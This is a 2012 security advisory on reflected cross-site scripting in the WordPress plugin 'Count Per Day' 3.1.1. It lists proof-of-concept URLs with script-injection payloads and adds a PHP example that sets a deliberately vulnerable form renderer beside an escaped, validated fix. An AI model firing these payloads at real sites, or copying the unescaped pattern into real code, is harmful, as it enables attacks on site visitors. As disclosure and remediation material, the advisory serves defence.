16 Jul 2012 09:37
WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities
<sschurtz <at> darksecurity.de>
2012-07-16 07:37:14 GMT
Advisory: WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities
Advisory ID: SSCHADV2012-015
Author: Stefan Schurtz
Affected Software: Successfully tested on 'Count Per Day' 3.1.1
Vendor URL: http://www.tomsdimension.de/wp-plugins/count-per-day
Vendor Status: fixed

==========================
Vulnerability Description
==========================

The WordPress plugin 'Count Per Day' 3.1.1 is prone to multiple reflected XSS vulnerabilities: the page, datemin and datemax GET parameters of userperspan.php are echoed into the response unescaped, so a value beginning with "/> closes the surrounding attribute and tag and the remainder is rendered as markup (see the PoC URLs below).

==================
PoC-Exploit
==================

http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?page="/><script>alert(88)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?page="/><script>alert(/xss/)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemin="/><script>alert(88)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemin="/><script>alert(/xss/)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemax="/><script>alert(88)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemax="/><script>alert(/xss/)</script>

=========
Solution
=========
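The following is an added example and is not code from the Count Per Day plugin or from the advisory author. It reconstructs, as a hypothetical snippet, the pattern the PoC URLs imply (GET parameters concatenated into HTML attribute values, which is why each payload starts with "/> to close the attribute and the tag), places the hardened form beside it, and applies the same check one would run against a live target after fetching a PoC URL: does the raw breakout sequence survive into the response? The function names, the form markup and the YYYY-MM-DD date format are assumptions made for illustration.

```php
<?php
// Added example for this advisory; NOT the Count Per Day plugin's code.
// It reconstructs the pattern the PoC URLs imply: GET parameters (page,
// datemin, datemax) echoed into HTML attribute values without escaping.
// The payload "/><script>...</script> first closes the attribute and the
// tag, then injects a script element. Requires PHP 7+.

// Vulnerable pattern (hypothetical reconstruction): raw $_GET values are
// concatenated straight into value="" attributes.
function render_filter_form_vulnerable(array $get): string
{
    $page    = $get['page']    ?? '';
    $datemin = $get['datemin'] ?? '';
    $datemax = $get['datemax'] ?? '';
    return '<form method="get">'
         . '<input type="hidden" name="page" value="' . $page . '"/>'
         . '<input type="text" name="datemin" value="' . $datemin . '"/>'
         . '<input type="text" name="datemax" value="' . $datemax . '"/>'
         . '</form>';
}

// Hardened form. Output encoding for the attribute context is the fix that
// works for any value; ENT_QUOTES matters because a double quote would
// otherwise still terminate the attribute. Inside WordPress, esc_attr()
// plays the role htmlspecialchars() plays here.
function attr(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Input validation on top of encoding: the date bounds have a fixed shape
// (assumed here to be YYYY-MM-DD), so anything else is dropped outright.
function clean_date(string $s): string
{
    return preg_match('/^\d{4}-\d{2}-\d{2}$/', $s) ? $s : '';
}

function render_filter_form_fixed(array $get): string
{
    $page    = attr((string) ($get['page'] ?? ''));
    $datemin = attr(clean_date((string) ($get['datemin'] ?? '')));
    $datemax = attr(clean_date((string) ($get['datemax'] ?? '')));
    return '<form method="get">'
         . '<input type="hidden" name="page" value="' . $page . '"/>'
         . '<input type="text" name="datemin" value="' . $datemin . '"/>'
         . '<input type="text" name="datemax" value="' . $datemax . '"/>'
         . '</form>';
}

// Check used to confirm the fix: the raw breakout sequence must not survive
// into the response. Against a live target the same test is fetching the
// PoC URL and searching the body for the unencoded payload.
function reflects_raw_payload(string $html, string $payload): bool
{
    return strpos($html, $payload) !== false;
}

// Constructed request mirroring the advisory's PoC URLs (page and datemin
// carry the payload, datemax a benign date).
$payload = '"/><script>alert(88)</script>';
$get = ['page' => $payload, 'datemin' => $payload, 'datemax' => '2012-07-16'];

foreach (['vulnerable' => render_filter_form_vulnerable($get),
          'fixed'      => render_filter_form_fixed($get)] as $label => $html) {
    printf("%-10s reflects raw payload: %s\n%s\n\n",
           $label, reflects_raw_payload($html, $payload) ? 'yes' : 'no', $html);
}
```

Run it with `php` on the command line and compare the two rendered forms: in the vulnerable output the injected script element is live markup, in the hardened output the quote and angle brackets are entities and the malformed date is gone. The page marks the vendor status as fixed but does not show the vendor's patch, so the hardened function above is the generic attribute-context fix, not a reproduction of the plugin's own change.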